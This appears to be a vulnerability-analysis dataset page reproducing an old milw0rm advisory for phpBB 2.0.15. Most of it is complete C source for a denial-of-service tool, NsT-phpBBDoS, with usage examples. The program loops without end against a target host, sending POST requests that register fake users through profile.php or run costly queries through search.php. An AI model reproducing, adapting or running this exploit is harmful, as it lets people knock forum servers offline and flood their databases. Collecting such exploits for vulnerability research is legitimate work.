Team Ai
Modelpublic

lilbool/vuln-code-analysis

sourceHugging Facemitupdated 2y agoView on Hugging Face
0likes
exploit_1064.txt248 linesDownload Raw Back to exploits
1/*

2--------------------------------------------------------

3[N]eo [S]ecurity [T]eam [NST]® - Advisory #15 - 00/00/06

4--------------------------------------------------------

5Program:  phpBB 2.0.15

6Homepage:  http://www.phpbb.com

7Vulnerable Versions: phpBB 2.0.15 & Lower versions

8Risk: High Risk!!

9Impact: Multiple DoS Vulnerabilities.

10

11    -==phpBB 2.0.15 Multiple DoS Vulnerabilities ==-

12---------------------------------------------------------

13

14- Description

15---------------------------------------------------------

16phpBB is a high powered, fully scalable, and highly customizable

17Open Source bulletin board package. phpBB has a user-friendly

18interface, simple and straightforward administration panel, and

19helpful FAQ. Based on the powerful PHP server language and your

20choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,

21phpBB is the ideal free community solution for all web sites.

22

23- Tested

24---------------------------------------------------------

25localhost & many forums

26

27- Explotation

28---------------------------------------------------------

29profile.php << By registering as many users as you can.

30search.php  << by searching in a way that the db couln't observe it.

31

32- Exploit

33---------------------------------------------------------

34[C Source]

35/*

36  Name: NsT-phpBBDoS

37  Copyright: NeoSecurityteam

38  Author: HaCkZaTaN

39  Date: 19/06/05

40  Description: xD You must figure out the problem xD

41  

42  root@NeoSecurity:/home/hackzatan# pico NsT-phpBBDoS.c

43  root@NeoSecurity:/home/hackzatan# gcc NsT-phpBBDoS.c -o NsT-phpBBDoS

44  root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS

45  [+] NsT-phpBBDoS v0.1 by HaCkZaTaN

46  [+] NeoSecurityTeam

47  [+] Dos has begun....[+]

48  

49  [*] Use: ./NsT-phpBBDoS <path> <search.php or profile.php> <Host>

50  [*] Example: ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com

51  root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com

52  [+] NsT-phpBBDoS v0.1 by HaCkZaTaN

53  [+] NeoSecurityTeam

54  [+] Dos has begun....[+]

55  

56  .................................

57  root@NeoSecurity:/home/hackzatan# echo "Let see how many users I have created"

58  root@NeoSecurity:/home/hackzatan# set | grep MACHTYPE

59  MACHTYPE=i486-slackware-linux-gnu

60  root@NeoSecurity:/home/hackzatan#

61

62*/

63

64#include <stdio.h>

65#include <stdlib.h>

66#include <string.h>

67#include <errno.h>

68#ifdef WIN32

69#include <winsock2.h>

70#pragma comment(lib, "ws2_32")

71#pragma pack(1)

72#define WIN32_LEAN_AND_MEAN

73#else

74#include <unistd.h>

75#include <sys/types.h>

76#include <sys/socket.h>

77#include <netinet/in.h>

78#include <arpa/inet.h>

79#include <netdb.h>

80#endif

81

82#define __USE_GNU

83#define _XOPEN_SOURCE

84

85int Connection(char *, int);

86void Write_In(int , char *, char *a, char *, int);

87char Use(char *);

88

89int main(int argc, char *argv[])

90{

91    int sock, x = 0;

92    char *Path = argv[1], *Pro_Sea = argv[2], *Host = argv[3];

93

94    puts("[+] NsT-phpBBDoS v0.1 by HaCkZaTaN");

95    puts("[+] NeoSecurityTeam");

96    puts("[+] Dos has begun....[+]\n");

97    fflush(stdout);

98

99    if(argc != 4) Use(argv[0]);

100

101    while(1)

102    {

103           sock = Connection(Host,80);

104           Write_In(sock, Path, Pro_Sea, Host, x);

105           #ifndef WIN32

106           shutdown(sock, SHUT_WR);

107           close(sock);

108           #else

109           closesocket(sock);

110           WSACleanup();

111           #endif

112           Pro_Sea = argv[2];

113           x++;

114    }

115    //I don't think that it will get here =) 

116

117    return 0;

118}

119

120int Connection(char *Host, int Port)

121{

122        #ifndef WIN32

123        #define SOCKET int

124        #else

125        int error;

126        WSADATA wsadata;

127        error = WSAStartup(MAKEWORD(2, 2), &wsadata);

128

129        if (error == SOCKET_ERROR)

130        {

131                  perror("Could Not Start Up Winsock!\n");

132                  return;

133        }

134

135        #endif

136

137        SOCKET sockfd;

138        struct sockaddr_in sin;

139        struct in_addr  *myaddr;

140        struct hostent *h;

141        

142        if(Port <= 0 || Port > 65535)

143         {

144                  puts("[-] Invalid Port Number\n");

145                  fflush(stdout);

146                  exit(-1);

147         }

148        

149        if((sockfd =  socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)

150        {

151                    perror("socket() ");

152                    fflush (stdout);

153                    exit(-1);

154        }

155

156        if(isalpha(Host[0]))

157        {

158           if((h = gethostbyname(Host)) == NULL)

159           {

160                     perror("gethostbyname() ");

161                     fflush (stdout);

162                     exit(-1);

163           }

164        }

165        else

166        {

167              myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));

168              myaddr->s_addr=inet_addr(Host);

169              

170              if((h = gethostbyaddr((char *) &myaddr, sizeof(myaddr), AF_INET)) != NULL)

171              {

172                     perror("gethostbyaddr() ");

173                     fflush (stdout);

174                     exit(-1);

175              }

176        }

177

178        memset(&sin, 0, sizeof(sin));

179        sin.sin_family = AF_INET;

180        sin.sin_port = htons(Port);

181        memcpy(&sin.sin_addr.s_addr, h->h_addr_list[0], h->h_length);

182

183        if(connect(sockfd, (struct sockaddr *)&sin, sizeof(struct sockaddr_in)) < 0)

184        {

185                     perror("connect() ");

186                     exit (-1);

187        }

188

189        return sockfd;

190}

191

192void Write_In(int sock, char *Path, char *Pro_Sea, char *Host, int x)

193{

194    char *str1 = (char *)malloc(4*BUFSIZ), *str2 = (char *)malloc(4*BUFSIZ);

195    char *req0 = "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\r\n"

196                 "Accept: */*\r\n"

197                 "Accept-Language: en-us\r\n"

198                 "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"

199                 "Accept encoding: gzip,deflate\r\n"

200                 "Keep-Alive: 300\r\n"

201                 "Proxy-Connection: keep-alive\r\n"

202                 "Content-Type: application/x-www-form-urlencoded\r\n"

203                 "Cache-Control: no-cache\r\n"

204                 "Pragma: no-cache\r\n";

205    char *Profile = "%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=1&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit\r\n";

206    char *Search  = "&search_terms=any&search_author=*&search_forum=-1&search_time=0&search_fields=all&search_cat=-1&sort_by=0&sort_dir=DESC&show_results=topics&return_chars=200\r\n";

207

208    if(strcmp("profile.php", Pro_Sea) == 0) sprintf(str1, "username=NsT__%d&email=NsT__%d%s", x, x, Profile);

209    else if(strcmp("search.php", Pro_Sea) == 0)

210    {

211               Pro_Sea = "search.php?mode=results";

212               sprintf(str1, "search_keywords=Hack%d%s", x, Search);

213    }

214    else

215    {

216               puts("Sorry. Try making the right choice");

217               exit(-1);

218    }

219

220    sprintf(str2, "POST %s%s HTTP/1.1\r\n"

221                  "Host: %s\r\n"

222                  "Referer: http://%s/\r\n%s"

223                  "Content-Length: %d\r\n\r\n%s", Path, Pro_Sea, Host, Host, req0, strlen(str1), str1);

224          

225    write(sock, str2, strlen(str2));

226    write(1, ".", 1);

227    fflush(stdout);

228}

229

230char Use(char *program)

231{

232	fprintf(stderr,"[*] Use: %s <path> <search.php or profile.php> <Host>\n", program);

233	fprintf(stderr,"[*] Example: %s /phpBB/ profile.php Victimshost.com\n", program);

234	fflush(stdout);

235	exit(-1);

236}

237

238/*

239

240@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@

241'@@@@@''@@'@@@''''''''@@''@@@''@@

242'@@'@@@@@@''@@@@@@@@@'''''@@@

243'@@'''@@@@'''''''''@@@''''@@@

244@@@@''''@@'@@@@@@@@@@''''@@@@@

245

246*/

247

248// milw0rm.com [2005-06-22]